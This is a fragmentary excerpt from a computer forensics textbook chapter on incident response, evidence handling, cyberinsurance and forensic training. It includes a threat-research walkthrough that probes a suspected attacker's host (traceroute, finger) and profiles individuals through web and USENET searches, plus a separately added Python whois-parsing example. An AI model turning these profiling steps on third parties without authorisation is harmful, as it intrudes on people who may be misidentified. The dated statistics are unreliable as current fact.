the largest threat to organizations has been employees and insiders, which is why
computer crime is often referred to as an insider crime
...
Internal events are committed by those with a substantial link to the intended
victim, for example, a bank employee who siphons electronic funds from a customer’s account
...
However, as advances continue to be made in remote networks, the threat from
external sources is on the rise
...
An external event is committed anonymously
...
Other types of external cyber
crime include computer system intrusion, fraud, and reckless or indiscriminate deliberate system crashes
...
However, when the person involved has used intimate knowledge of the information
technology infrastructure, obtaining digital evidence of the offense can be difficult
...
Typically, the offender has
no motive and is not even connected with the organization, making it fairly
straightforward to prove unlawful access to data or systems
...
Forensic investigators detect the extent of a security breach,
recover lost data, determine how an intruder got past security mechanisms, and,
possibly, identify the culprit
...
They should also
be knowledgeable in the law, particularly legal jurisdictions, court requirements,
and the laws on admissible evidence and production
...
The alternative is pursuing civil remedies, for instance, pursuing breach of
trust and loss of intellectual property rights
...
Notwithstanding the
technical expertise of information technology (IT) teams, most companies are ill-equipped to investigate cyber crime in a way that results in the collection of admissible evidence
...
In other words, it must meet the requirements of the jurisdiction’s laws of evidence
...
As a result, law enforcement organizations and computer forensic experts
are often forced to use archaic and nonspecific laws to fit unusual circumstances
...
However, if a disgruntled employee copied an organization’s database
and sold it to a rival company, the organization is not permanently deprived of the
data; therefore, technically, no offense of theft has been committed
...
However, even in
cases where there is a clearly defined crime, corporations are often hesitant to pursue a criminal conviction because of the time, cost, and reputation risk involved in
reaching a legal outcome
...
With legislation lagging behind technology, businesses have had no choice but to absorb the responsibility for
the security of their most valuable asset—their information
...
The best approach for organizations wanting to counter cyber crime is to apply
risk-management techniques
...
Effective IT and Staff Policies
Well-communicated and “plain English” IT policies educate staff about their rights
and obligations in the workplace
...
To be effective,
IT policies should make plain what an individual employee can and cannot do on
the organization’s systems and the legal implications of misuse
...
Effective policies diminish the risk of internal attack, particularly unintentional
attack
...
Vendor Tools of the Trade
Although internal policies will not dissuade external cyber criminals, the right vendor tools will detect an external attack and alert the organization to the threat
...
Choosing the right cyber crime detection tools is essential for risk management
in all organizations, but like most applications associated with an organization, the
question is, what is the right tool? The right tools are those that deliver appropriate
information that the forensic expert can interpret to achieve the best outcome
...
To deliver the
information needed, software tools should be probing (without compromising the
target of interrogation), concise, able to report findings fully, supported, and easy
to use
...
The 2003 CSI/FBI Computer Crime and Security Survey shows a significant increase in companies using intrusion detection systems, from 58% in 2001 to 79%
in 2003 [2]
...
As with all of today’s technology, detection tools date quickly as new threats
emerge
...
Some online products and services currently on the market provide efficient, cost-effective solutions by accessing
computer vulnerabilities specific to an organization’s IT environment
...
However, the attack itself does not have the greatest impact on a company
...
Without the appropriate procedures in place to counter detected attacks, an organization is exposed
to the risks of lost data, financial loss, network damage, and loss of reputation
...
For example, the simple process of ensuring that the
right people know about the incident when it happens enhances an organization’s
response, both in time and effective handling procedures
...
By appointing a forensic expert to manage the response to an incident,
organizations ensure all avenues are canvassed, all evidence located and handled
correctly, and all those involved treated impartially (see sidebar, “Computer Forensic Incident Response Procedures [CFIRP]”)
...
The only people on the mailing list who are up and awake and reading their mail are
the operations staff, but they know that sometimes in the wee hours, one of the more
nocturnal network staff comes in
...
To their
delight, he is in his office, so they forward him the security email and consider their
part of this incident finished
...
He then sends an email to security stating that the hosts are blocked and considers his part in this incident finished
...
The entire team
assumes that the nocturnal network person notified the owner of the machines of
the problem and that action has been taken
...
Outcome
The two servers that were blocked were two major servers for the math department
...
The math department has their own system administrators, who were not on the security mailing list
...
No one informed the owners of the alleged compromised hosts of the
network block of the alleged compromise until the problem was elevated to the
director of networking and the chair of the math department
...
You should start with an
outline of the key elements of a successful CFIRP but also include forms that can be
used to identify the incident contact personnel as well as forms for incident handling, containment, and eradication
...
There may be times when local law enforcement will pay you a visit
...
Knowing someone in your local computer crimes lab is a good idea
...
The FBI has developed a collaborative effort, named InfraGard
...
It is also critical to have someone assigned to notify and report incidences to
CERT
...
Last but certainly not least, let’s not forget that an ounce of prevention is worth
a pound of cure
...
It’s been proven time and time again that most security
problems originate from inside organizations
...
When developing your policy, a lot will depend on the type of
organization
...
If you don’t think you need a CFIRP policy, try the following exercise: Do a
mock incident (with the permission of your management), but don’t let your security people know it is an exercise
...
You
will need to take into consideration all the nuances of your site and get support and
buy-in from upper management
...
In other words, deterrence is the appropriate forensic response and the fundamental element of a defensive strategy for the organization
...
This is the essence of the three key
causal variables of general deterrence theory: certainty, severity, and celerity
...
Thus, while deterrence is recognized as a highly effective defensive strategy, its applicability to defense against attacks on our nation’s information infrastructures is not clear,
mainly because of our inability to link attackers with attacks
...
As with the “weak link” and “picket fence” analogies, if
any one of these steps is missing or ineffective, the ability to achieve the desired result is compromised
...
Any response is
generally limited to logging, reporting, and isolating or reconfiguring
...
While defensive techniques are important, it’s critical not to “stovepipe” in
such a way that you can’t effectively link with the offensive component of an overall strategic cyber defense
...
Such a capability is critical if your cyber defenses are to transcend a merely reactive posture to one in which both offensive and
defensive techniques can be effectively applied in tandem
...
Forensics
response capabilities could help provide the bridge between the defensive and offensive elements of an overall cyber defense strategy
...
Otherwise, attackers can act with impunity, feeling confident that they
need not fear the consequences of their actions
...
Although forensic response
techniques are highly developed for investigations in the physical realm and are
being developed for application to computer crime, what is needed is an analogous
capability for real-time, distributed, network-based forensic response analysis in the
cyber realm
...
Critical supporting technologies include those needed for
correlation and fusion of evidence data, as well as automated damage assessment
...
Cyber attacks against the U.S. and its allies may not have the obvious visual cues and physical impact typically associated with attacks in the physical realm
...
Depending on the situation, it may be
necessary to have irrefutable proof of the source of the attack, the kind of proof typically developed through forensic response methods
...
Use of such a capability implies the need for laws specifying authorization to conduct cyberspace
pursuits and cooperative agreements with foreign governments and organizations
...
Extending the aircraft analogy, the need for effective identification during cyberspace pursuits, and for coordinating offensive IW response actions through intermediary “friendly” networks, may necessitate a type of “network identification
friend or foe (IFF)” capability, just as the introduction of fast-moving aircraft in the
physical realm created the need for secure IFF
...
One issue of concern at the strategic level of IW is the distinction between the
military and private sector information infrastructures
...
The approach suggested in this section may be applicable regardless of
whether the networks attacked belong to the military
...
From
an organizational perspective, efforts are underway to develop the necessary coordination structures, such as the National Infrastructure Protection Center, between
the private and commercial sectors
...
Another fundamental concern this approach may help address is the problem
of malicious insiders
...
Attacks initiated from within the enclave, possibly even by a trusted insider, have traditionally been much harder to defend against
162
Computer Forensics, Second Edition
...
These systems simply check whether a user is acting within the prescribed privileges while remaining completely oblivious to the abuse of those privileges
...
The need for timely and unequivocal
identification of attackers is essential for such an approach to be effective
...
In addition, there may be some
complicating factors for the implementation of the type of identification and forensics response capability discussed here, such as the widespread move to encryption
...
COMPUTER FORENSICS INVESTIGATIVE SERVICES
There are without doubt some very knowledgeable experts in the field of computer
forensics investigations; however, there has been an increase in the number of people purporting to be experts or specialists who produce flawed opinions or take actions that are just plain wrong
...
Most investigations are basically the same in that
they are either proving or disproving whether certain actions have taken place
...
In many companies, forensic computer examiners are kings because they have
more knowledge of the subject than their peers
...
Time restrictions can cause them to take short cuts that invalidate the very evidence
they are trying to gather, and when they do not find the evidence that people are demanding (even if it isn’t there), they are subject to criticism and undue pressure
...
The specialists’ management does not understand what they are doing (and probably don’t
want to admit it), and often they are faced with the question, “Can’t you just say this?”
...
This sort of pressure comes not only from within the organizations, but also
from external sources
...
Working in isolation is a major problem; apart from talking to yourself (first sign
of madness), many people have no one else to review their ideas and opinions
...
Computer Intrusion Detection Services
Installing technical safeguards to spot network intruders or detect denial-of-service
attacks at e-commerce servers is prudent, but if your staff doesn’t have the time or
skills to install and monitor intrusion detection software, you might consider outsourcing the job
...
Although outsourcing security means divulging sensitive information about your
network and corporate business practices, some companies say they have little
choice but to get outside help, given the difficulty of hiring security experts [6]
...
5 billion in 2003
...
4
billion, fueled by the trend toward outsourcing internal local area network (LAN)
security to professional security firms as virtual employees
...
The
digital evidence collection process not only allows you to locate that key evidence,
but also maintains the integrity and reliability of that evidence
...
Any delay or continued use of
the suspect computer may overwrite data prior to the forensic analysis and result in
destruction of critical evidence (see sidebar, “Evidence Capture”)
...
This could result
in destruction of evidence
...
Removable storage devices (Zip, Jaz, Orb, floppy diskettes, CDs, Sony Memory Sticks, SmartMedia, CompactFlash, LS-120, optical disks, SyQuest, Bernoulli, microdrives, pocket drives, USB disks, FireWire disks, PCMCIA)
Network storage devices (redundant array of independent [or inexpensive]
disks [RAIDs], servers, storage area networks [SANs], network attached
storage [NAS], spanned, remote network hard drives, back-up tapes, etc
...
Secure all removable media
...
Disconnect the computers from the network
...
EVIDENCE CAPTURE
One of the fundamental principles of computer investigation is the need to follow
established and tested procedures meticulously and methodically throughout the
investigation
...
Reproducibility of evidence is the key
...
Another frequent problem with capturing evidence is lack of experience—not
only lack of site experience but also inappropriate experience of the type of systems
that might be encountered
...
It is essential that a sympathetic working environment is created such
that peer pressure or fear of loss of status and respect does not override the need to
call for help
...
Finally, sloppiness, time pressure, pressure applied on-site, fatigue, or carelessness
have all been contributory factors in transforming solid computer evidence into a dubious collection of files
...
They are issues for which there is no sympathy
...
Ultimately, any time the collection of computer evidence is called into question, it
is potentially damaging to everyone who is a computer forensic practitioner; it is ultimately in everyone’s best interest to ensure that the highest standards are maintained
...
This type of computer forensics service is used by countless organizations (banks, insurance companies, law firms, local governments, retailers,
technology firms, educational institutions, charitable organizations, manufacturers, distributors, etc
...
Corporations and government agencies are racing
to provide Internet access to their employees
...
Paramount is loss of productivity; workers can easily spend
countless hours online entertaining and amusing themselves at their employer’s expense
...
Although protecting your organization from outside threats is clearly important, protecting the organization from internal threats is at least as important, if
not more so
...
A quarter reported
theft of proprietary information, and 80% reported theft of laptop computers
...
According to Sextracker, an organization that tracks the online
pornography trade, 82% of online pornography viewing occurs during the 9–5
work day [2]
...
The content should be based on your corporation’s experience in employment-related investigations, computer crime investigations, civil litigation, and criminal prosecutions
...
The discussions should include topics such as why policies are needed,
potential liability, employee productivity considerations, and civil litigation
...
The
policies should directly address the problems that you would typically find in organizations of all sizes
...
As the risk increases, so will the interest in policies and the cost of
premiums and litigation
...
The concept
of insuring digital assets has been slow in catching on because the risks and damages were hard to quantify and put a price tag on
...
At the same time, it has become
harder to find underwriters willing to insure multimillion-dollar cyberspace policies
...
Prior
to September 11, 2001, the focus of information security was on critical infrastructure
...
Insurance stalwarts such as Lloyd’s of London, AIG, and Zurich now offer policies for everything from hacker intrusions to network downtime
...
While the market was already moving to provide policies to cover these risks,
many executives viewed cyberinsurance as a luxury that yielded few tangible benefits
...
There was a naiveté on the part of senior management
...
The aftermath of the 9-11-01 attacks illustrates the interconnectedness of all
systems: financial services, information and communications, transportation, electrical power, fire, and police
...
Businesses are starting to think about what type of recovery
position they would be in if something similar to the World Trade Center attack
happened to them
...
Premiums are going up
significantly and underwriters are hesitating to sign big policies
...
Now it’s much
more difficult
...
The marketplace is in transition, and
there’s undoubtedly a hardening of trading conditions for both traditional property
and casualty insurance, as well as the emerging new e-commerce products
...
It’s difficult to pinpoint the losses if data
is corrupted, a network is hacked, or system uptime is disrupted
...
To develop robust cyberinsurance, two major developments need to take place
...
Second, insurance carriers need
to develop a better understanding of the IT systems in use and how they interact
with other information and automated systems
...
The first indication of
this trend came earlier in 2001, when an underwriting company tacked a 5 to 15%
surcharge on cyberinsurance premiums for users of Windows NT on Internet Information Services (IIS) servers, citing their poor security track record, which
makes them more expensive to insure
...
FORENSIC PROCESS IMPROVEMENT
The purpose of this section is to introduce the reader to a process that will enable a
system administrator or information security analyst to determine the threat
against their systems and networks
...
Although it is rare, some of these simple techniques may help you identify the
perpetrator of an attack on your system
...
The risk any system connected to the Net faces is a product of
vulnerability and threat
...
If you can understand your attacker, then you can better defend against and respond to attacks
against your network
...
So why bother researching the apparent source of an attack? What if your system is the first system of many that the hacker will use in his or her attack against
other systems? Could you be held liable for damage done by the attacker to someone else’s systems? What if the attacker is operating from within a country that has
no laws against hacking and can thus operate with impunity? Or what if the hacker
is unskilled and has left clues behind that a skilled researcher could use to identify
him or her? All of these reasons justify taking a small amount of time to research the
apparent source of a serious attack or intrusion
...
This should be done if the level and seriousness of the attack justify such an action
...
The Tools
The tools discussed here outline a step-by-step process that will help you identify
the attacking host and possible actors that may have used that host to attack your
system
...
There are many sources of information that cover each tool by itself in more
detail
...
Keep in mind that here we are talking about the
overall process of characterizing the threat from a domain
...
For detailed switchology on the use of each tool, consult the man pages or other
sources for each tool listed
...
In this way, you do not
run the risk of further antagonizing or scaring off a potential intruder who might
be watching the connection logs from his or her victimized host
...
samspade
...
This
site also contains a brief description of each tool and its use
...
Another useful site is http://network-tools
...
Dig -x / nslookup
The first step in the process is to reverse the offending IP address
...
The “-x” option will ensure that you receive all records possible about your
host from the Domain Name Service (DNS) table
...
The “nslookup” command, nslookup ip, will also perform a reverse lookup of the host IP address, but will only return the resolved name
...
This can be a tricky operation
...
The main gateways are ARIN
(the American Registry), APNIC (the Asian Pacific Registry), and RIPE (the European Registry)
...
If your whois data does not match your resolved name, for example the resolved name http://www
...
com and the whois database ARIN indicates
the registered owner is CNN network (a match), then you may have to do some
more digging
...
You may want
to then research your IP with the country-specific whois database to determine the
correct registered owner
...
allwhois
...
For more information on conducting detailed
whois queries check out http://www
...
org
...
Note that many administrators block ICMP traffic, so this is not conclusive evidence either way
...
Traceroute may help you in two
ways
...
Look at the resolved host just before your target
...
Also, a traceroute might give you an important clue about the physical location of the attacking box
...
Do they tell you what city they are in? Often they will
...
Finger
Run a finger @ip command to determine who is currently logged onto the system that attacked you
...
However, it does not hurt to try
...
They may also have the finger service running
...
You might be surprised to see root logged on from a third system in another country
...
You should be able to trace back hackers through several countries using
this simple, often-overlooked technique
...
This may indicate where the host was compromised from and is the next clue to where to focus your research
...
You will know this domain name by looking at the resolved name of the host and the whois data
...
altavista
...
” This query will return
the Web links of possible hackers who operate from the domain name you queried
...
The number of Web pages returned by the query, as well
as the details on those pages, gives you an indication of the level of threat to assess
to a certain domain
...
co
...
co
...
You may be surprised to see a return of some 55,000-plus hacking-related pages hosted on this domain
...
As a standard practice, you might want to block certain domains at your firewall if you are not already blocking ALL:ALL
...
This will show all Web
pages that have a link to the domain in question listed on their Web page
...
You will also want to keep in mind the target of the attack
...
” Check newswires or other competitive intelligence sources to determine, if possible, who might be going after your company’s resources
...
anonymizer
...
Vendor and Computer Forensics Services
171
USENET
The last step in the process of threat identification is to conduct a USENET traffic
search on your domain
...
Search on the attacking IP address in quotes to see if other people are reporting activity from this IP in any security newsgroups
...
You can expand the headers of the postings by
clicking on “view original posting
...
This method can reveal the true location of your hacker
...
Look at the newsgroups
your hacker posts to and look at the number and sophistication of those postings
...
A hacker will often let down his guard when
talking about his favorite band or hobby, for example
...
icq
...
Putting It All Together
Once you have completed the process previously outlined and gathered all the information from these tools, you should be able to make an educated guess about
the threat level from the domain you are analyzing
...
An excellent site to check for
archived postings of recently seen attacks is both http://www
...
org and
http://www
...
com
...
Could you tell from the logs that the
attacker was attempting to find a vulnerable FTP server to perhaps set up a warez
or mp3 site? Being able to make an educated guess about the motivation of your
hacker is important
...
The process previously outlined can be used to narrow down possible candidates or characterize the threat level from responsible domains
...
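The reverse-lookup and whois steps of the process above, written up as an added example that is not from the book: it parses captured dig -x and whois output and makes the “resolved name versus registered owner” comparison explicit. The parsing functions, the owner field names accepted and the sample tool output are my own constructions (the address is from the RFC 5737 documentation range and names no real network), and the owner check is a deliberate simplification.

```python
"""Structured version of the reverse-lookup and whois steps.

The sample tool output below is constructed for illustration only; the
address is from the RFC 5737 documentation range and names no real network.
"""
from __future__ import annotations

import ipaddress
import re
from dataclasses import dataclass, field

# Constructed `dig -x 203.0.113.45` answer section.
SAMPLE_DIG = """\
;; ANSWER SECTION:
45.113.0.203.in-addr.arpa. 3600 IN PTR mail.example.net.
"""

# Constructed ARIN-style whois record for the same address.
SAMPLE_WHOIS = """\
NetRange:       203.0.113.0 - 203.0.113.255
CIDR:           203.0.113.0/24
NetName:        EXAMPLE-NET-3
OrgName:        Example Hosting Inc.
Country:        US
"""

# A source in these ranges cannot be the true external attacker: either the
# address was spoofed or the traffic originated inside your own perimeter.
RFC1918 = [ipaddress.ip_network(n)
           for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Owner fields as named by ARIN (OrgName) and by RIPE/APNIC (org-name, descr).
# Assumption: these are the fields a practitioner reads for the registered owner.
OWNER_KEYS = ("orgname", "org-name", "descr")


@dataclass
class Assessment:
    ip: str
    researchable: bool
    ptr_names: list[str] = field(default_factory=list)
    owner: str | None = None
    country: str | None = None
    notes: list[str] = field(default_factory=list)


def is_researchable(ip: str) -> bool:
    """Skip loopback, link-local, multicast and RFC 1918 sources."""
    addr = ipaddress.ip_address(ip)
    if (addr.is_loopback or addr.is_link_local
            or addr.is_multicast or addr.is_unspecified):
        return False
    return not any(addr in net for net in RFC1918)


def parse_dig_ptr(output: str) -> list[str]:
    """Return PTR targets from a `dig -x` answer section, trailing dot removed."""
    ptr_re = re.compile(r"^\S+\s+\d+\s+IN\s+PTR\s+(\S+)", re.MULTILINE)
    return [name.rstrip(".") for name in ptr_re.findall(output)]


def parse_whois(output: str) -> dict[str, str]:
    """Flatten `Key: value` lines of a whois record into a dict (keys lower-cased).
    Repeated keys, common for RIPE descr: lines, are joined with ' / '."""
    fields: dict[str, str] = {}
    for m in re.finditer(r"^([A-Za-z][\w-]*):\s*(.+?)\s*$", output, re.MULTILINE):
        key, value = m.group(1).lower(), m.group(2)
        fields[key] = f"{fields[key]} / {value}" if key in fields else value
    return fields


def owner_matches_ptr(owner: str, ptr_name: str) -> bool:
    """The book's comparison: does the registered owner plausibly own the
    resolved name? Simplification: the PTR name's second-level label must
    appear as a word in the owner string."""
    labels = ptr_name.lower().split(".")
    if len(labels) < 2:
        return False
    return labels[-2] in re.findall(r"[a-z0-9]+", owner.lower())


def assess(ip: str, dig_output: str, whois_output: str) -> Assessment:
    """Combine the reverse lookup and whois results into one worksheet entry,
    recording where the process says to dig further."""
    a = Assessment(ip=ip, researchable=is_researchable(ip))
    if not a.researchable:
        a.notes.append("non-routable source: suspect spoofing or an internal origin")
        return a
    a.ptr_names = parse_dig_ptr(dig_output)
    if not a.ptr_names:
        a.notes.append("no PTR record: rely on whois and traceroute for location")
    rec = parse_whois(whois_output)
    a.owner = next((rec[k] for k in OWNER_KEYS if k in rec), None)
    a.country = rec.get("country")
    if a.owner is None:
        a.notes.append("no owner field: query the country-specific registry")
    elif a.ptr_names and not any(owner_matches_ptr(a.owner, n) for n in a.ptr_names):
        a.notes.append("resolved name and whois owner differ: dig further")
    return a


if __name__ == "__main__":
    print(assess("203.0.113.45", SAMPLE_DIG, SAMPLE_WHOIS))
```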
Finally, let’s look at what is probably the most important computer forensics
service: training
...
It
places priority on computer incident responses and now covers computer forensic
binary data searches for foreign language (non-Latin based) computer data (Farsi,
Chinese, Japanese, etc
...
Often the computer evidence was created transparently by the computer’s operating system and without the knowledge
of the computer operator
...
It is this information that benefits law enforcement and military agencies in intelligence gathering
and in the conduct of investigations
...
Computer forensic software tools and methods can be used to identify
passwords, computer network log-ons, and other information that is transparently
and automatically transferred from the computer’s memory to floppy diskettes,
Iomega Zip Disks, and computer hard disk drives
...
These techniques should be taught in your specialized training course
...
Therefore, computer forensics training courses should be
taught by certified instructors (see sidebar, “Computer Forensics Certified”) who
are experienced computer crime experts (retired federal law enforcement computer evidence trainers and members of law enforcement computer crime units)
...
The
research firm predicts that by 2009, INFOSEC certification will be required for 90%
of CISOs (chief information security officers) and associated training staff positions
and for 70% of day-to-day technical operations positions in Global 2004 companies
...
THE DEMANDS OF SECURITY
It’s bad enough when a certified IT employee doesn’t possess claimed skills, but the
skills gap is doubly worse in the security realm
...
This market didn’t exist 13 years ago
...
Protecting a company’s most cherished assets (not just IT systems, but especially
the digitally stored proprietary information on those systems) demands knowledgeable personnel, something not always easy to assess
...
” Such people must be able to prove their
credentials with INFOSEC certification
...
Security is the system administrator area that
requires the most constant learning and relearning
...
The breadth of skills and management ability required for strong
information security puts unusual demands on organizations and professionals
...
There’s also Certified Internet Webmaster (CIW) professional certification, coming on strong
...
This is where the line in the security sand
is drawn
...
GIAC responds directly to the skills question
...
In intrusion detection, for
example, a candidate must accurately analyze ten real-world intrusion attempts
before being allowed to take the exam
...
When comparing CISSPs to GIAC, the metaphor is an MBA (CISSP) versus a
CPA (GIAC)
...
Research indicates that strategic business planning is what the
industry desperately needs
...
An analogy suggested by an International Steering Committee (ISC) board member is that GIAC is
for pilots and CISSP is for the managers who schedule the pilots
...
The product focus has limitations, because security professionals need to take into account the whole picture
...
Believe it or not, issues such as
buffer overflows still form a large part of the action on security lists
...
You cannot really say the technical issues are more important than management
issues, but the technical issues are more solvable
...
Even if you had the best
of the best techies on your payroll, you wouldn’t be going anywhere unless the issues
and policies around corporate standards, user awareness, remote and wireless access
policies [8], acceptable authentication methods, and so forth have been decided
...
The product versus politics dilemma will eventually be moot with SANS’ Security
Essentials (LevelOne) certification
...
GROWING A PROFESSION
The information security profession draws people from diverse backgrounds into a
cohesive group
...
How do we learn
to talk to each other? You need an agreed-on taxonomy, and that, certification advocates indicate, is what certification does: it creates a shared body of knowledge to
encourage a cohesive professional body
...
CISSP is the
gold standard of security management and program development, but a certification
should be the beginning of a learning process, not an end in itself
...
The security threat is always changing, so security certification tests, more than any others, are out of date before the
person even begins to study for them
...
Once certifications
become widely accepted, some of their value will be lost
...
Although most computer forensics training courses do not answer all possible
questions regarding computer evidence and computer security, they should cover
most of the common issues and expose the participant to new state-of-the-art computer forensics techniques and computer forensics tools
...
An
expert witness testimony on electronic evidence course should fill in the gaps when
the participant is ready for those advanced training courses
...
This should
not be a computer forensics paint by numbers training course
...
The training course should be unique; the participants are expected to have a
high degree of computer proficiency, know the difference between clusters and sectors, and have experience in the use of the latest Microsoft Windows platforms
...
It should be a technical
hands-on training course that will tax your knowledge and computer skills
...
Because the course should deal with computer security issues and computer
risk management as well as computer evidence issues, it should be well suited for
computer security specialists, computer incident response team members, and
computer crime investigators
...
In special cases, a course like this should be taught at the training facilities of corporate and government sponsors
...
Concerning these operating systems, it should cover evidence preservation, evidence-processing methodologies,
and computer security risk assessments in detail
...
However,
you should have an advanced Windows NT training course that covers computer
security and computer evidence issues associated with Windows NT, Windows
2000, Windows XP, and Windows 2003 in great detail
...
Thus, they are the most likely operating systems to be encountered in computer investigations, internal audits, and
computer security reviews
...
Those tools are good for some basic
investigation tasks, but they do not offer a complete and accurate computer forensics solution
...
Computer security risk assessments usually require that searches and
file listings be conducted overtly (or covertly) from a single floppy diskette
...
They should also leave the course with a good understanding of the following:
Computer evidence processing
Preservation of evidence
Trojan horse programs
Computer forensics documentation
File slack
Data-hiding techniques
Internet-related investigations
Dual-purpose programs
Text search techniques
Fuzzy logic tools used to identify previously unknown text
Disk structure
Data encryption
Matching a floppy diskette to a computer
Data compression
Erased files
Internet abuse identification and detection
The boot process and memory resident programs
Computer-Evidence-Processing Procedures
The processing procedures and methodologies taught in a computer forensics
course should conform to federal computer-evidence-processing standards
...
The methods and many of the
software tools should conform specifically to the computer-evidence-processing
procedures followed by the FBI, U.S. Department of Defense, and the U.S. Drug Enforcement Administration
...
The participant should be exposed to bit stream back-up procedures that ensure the preservation of all storage levels that may contain evidence
...
The participant should demonstrate his or her ability to avoid destructive programs and traps that can be planted by computer users
bent on destroying data and evidence
...
This should also be
demonstrated during the course
...
This is even true for computer security risk assessments, computer incident
responses, and internal audits, because without proper documentation it is difficult to present findings in court or to others
...
The participant should be
taught computer-evidence-processing methodology that facilitates good evidence-processing documentation and solid evidence chain of custody procedures
...
File Slack
The occurrence of random memory dumps in hidden storage areas [9] should be
discussed and covered in detail during workshops
...
Such
data is the source of potential security leaks regarding passwords, network logons,
email, database entries, and word processing documents
...
The participants should be able to demonstrate their ability to deal with slack from both an
investigations and security risk standpoint
...
Data-Hiding Techniques
Trade secret information and other sensitive data can easily be secreted using any
number of techniques
...
These issues should be discussed from
a detection standpoint as well as from a security risk standpoint
...
Participants should be required to demonstrate their understanding of
such issues
...
Data-hiding issues should be covered in much more depth in a data-hiding course
...
This should include a demonstration of how Internet-related evidence differs from more traditional computer evidence
...
Dual-Purpose Programs
Programs can be designed to perform multiple processes and tasks at the same
time
...
These concepts
should be demonstrated to the participants during the course through the use of
specialized software
...
Text Search Techniques
Specialized search techniques and tools should be developed that can be used to
find targeted strings of text in files, file slack, unallocated file space, and Windows
swap files
...
Because
of the need to search for non-Latin words and word patterns tied to foreign languages, the course should also cover the search of such data tied to foreign languages (Farsi, Chinese, Japanese, etc
...
Traditional
computer evidence searches require that the computer specialist know what is
being searched for
...
Thus,
not all is known about what may be stored on a targeted computer system
...
The participants should fully understand these methods
and techniques
...
Disk Structure
Participants should leave the course with a solid understanding of how computer
hard disks and floppy diskettes are structured and how computer evidence can reside at various levels within the structure of the disk
...
Data Encryption
A computer forensics training course should also cover how data is encrypted and
illustrate the differences between good encryption and bad encryption
...
Matching a Floppy Diskette to a Computer
Specialized computer forensics techniques and computer forensics tools should
also be developed that make it possible to conclusively tie a floppy diskette to a
computer hard disk drive
...
Some computer forensics experts believe floppy diskettes are no longer popular
...
Floppy diskettes are found to be a valuable source of computer
evidence in some civil litigation cases that involve the theft of trade secrets
...
Furthermore, the participant should learn
how password-protected compressed files can be broken
...
Documentation of the process should
also be covered in detail
...
This process should focus on
computer forensics issues tied to data that the computer user probably doesn’t realize exists (file slack, unallocated file space, and Windows swap files)
...
Nevertheless,
it should be provided free of charge to law enforcement computer crime specialists
who attend the course
...
The Boot Process and Memory Resident Programs
Participants should be able to see how easy it is to modify the operating system to
capture data and to destroy computer evidence
...
For this reason, it is important that the participants understand
these potential risks and how to identify them
...
These scenarios
will briefly cover planned forensics responses
...
CASE HISTORIES
The following case study illustrates the organizational benefits of a planned forensic response
...
After
discovering the activity, the IT manager remotely accesses the employee’s personal
computer to obtain evidence
...
Scenario Two
An IT manager reviews a detection tool report indicating a company employee is
accessing restricted Internet sites and downloading objectionable material
...
The CIO then invokes the company’s incident response plan by contacting the
incident response team, which includes computer forensics experts
...
By following its effective policies and procedures,
the organization (via the CIO) is in an excellent position to take immediate legal
and decisive action based on all the available facts and evidence
...
In Scenario
One, the evidence was obtained remotely
...
Any court of law would want to know whether there were policies and IT infrastructure for ensuring the IT staff member knew the correct PC was accessed
...
Can it be proved that the
objectionable material was viewed on a particular PC? Who else had access to that
PC? It is likely that there is not adequate evidence in this scenario to answer these
questions
...
If action is taken without proper policies, procedures, and processes in
place, it is nothing more than an unplanned knee-jerk reaction
...
Clearly, any investigation must not only be thorough and methodical, but staff also need procedures for reporting the activity, conducting the investigation, and appointing
investigators
...
This places the organization in a comfortable position to resolve the situation, contain the potential
damage, and effectively seek compensation or prosecution
...
SUMMARY
Don’t react
...
Cyber crime is rapidly increasing and is striking at the heart
of many organizations
...
Businesses can respond quickly, minimizing the risks of
lost data, financial loss, network damage, and loss of reputation
...
Although organizations cannot prevent a cyberattack, they can have a planned response and even
turn e-crime preparedness, or effective security, into a new competitive advantage
...
The same technological revolution
has also brought forth a new breed of investigative and legal challenges
...
Questions arise regarding location of evidence stored on
digital media, analysis of that evidence, and authentication of that evidence in
court
...
Computer forensic services include digital evidence collection, forensic analysis of digital evidence (including analysis of hidden, erased, and password-protected files), and expert witness testimony
...
Who can benefit from computer forensic services: attorneys involved in complex litigation that deals with digital evidence; human resource professionals
involved in administrative proceedings such as wrongful termination claims,
sexual harassment, discrimination allegations, and employee violations of
company policies and procedures, where key evidence may reside in emails,
word processing documents, and the like; and company executives who are interested in confidentially auditing their employees’ computer usage concerning
proprietary information, misuse of company resources, and trade secret issues
...
Documentary evidence has quickly moved from the printed or type-written
page to computer data stored on floppy diskettes, zip disks, CDs, and computer
hard disk drives
...
With the recent increasing trend toward using distributed denial of service attacks, it has become nearly impossible to identify the true source of an attack
...
Proactive monitoring and alerting of backbone and client bandwidth with
trending analysis is an approach that can be used to help identify and trace attacks quickly without resource-intensive side effects
...
Timely communication between ISPs is essential in incident handling
...
Even after a hard drive is reformatted or repartitioned, data can be recovered
...
Forensic analysis can reveal what Web sites have been visited, what files have
been downloaded, when files were last accessed, when files were deleted, attempts to conceal or destroy evidence, and attempts to fabricate evidence
...
Some fax machines can contain exact duplicates of the last several hundred
pages received
...
Email is rapidly becoming the communications medium of choice for businesses
...
Email has been used successfully in civil
cases as well as criminal cases, and email is often backed up on tapes that are
generally kept for months or years
...
An Agenda for Action
When completing the Vendor and Forensic Services Types Checklist (as shown in
Table F4
...
The order is not significant; however, these are the activities for which the researcher would want to provide a detailed description of
procedures, review, and assessment for ease of use and admissibility
...
Finally, let’s move on to the real interactive part of this chapter: review questions and exercises, hands-on projects, case projects and optional team case project
...
CHAPTER REVIEW QUESTIONS AND EXERCISES
True/False
1
...
2
...
3
...
4
...
5
...
Multiple Choice
1
...
Financial information
B
...
Theft of proprietary information
D
...
Unauthorized access by insiders and employee misuse of Internet access
privileges
2
...
Do not turn on or attempt to examine the suspect computer
...
B
...
C
...
D
...
E
...
3
...
They should also leave the course with a good understanding of the
following, except:
A
...
Preservation of evidence
C
...
Computer forensics documentation
E
...
Internal events are committed by those with a substantial link to the intended
victim, for example, a bank employee who siphons electronic funds from a
customer’s account
...
Downloading or distributing offensive material
B
...
Internal system intrusions
D
...
Unintentional or intentional addition or damage of data or systems
5
...
Detect the extent of a security breach
...
Recover found data
...
Recover lost data
...
Determine how an intruder got past security mechanisms
...
Potentially, identify the culprit
...
How would the CFS handle this analysis?
HANDS-ON PROJECTS
Data Recovery Services in Action
After two former employees left a high-quality large-format imaging firm to work
for a competitor, the defendants emailed the firm’s customer database to their
home computer in an attempt to steal intellectual property from the firm and provide it to their new employer
...
How
would the firm’s CFS team go about investigating this case?
Case Projects
A large computer services corporation suspected an employee, who was a foreign
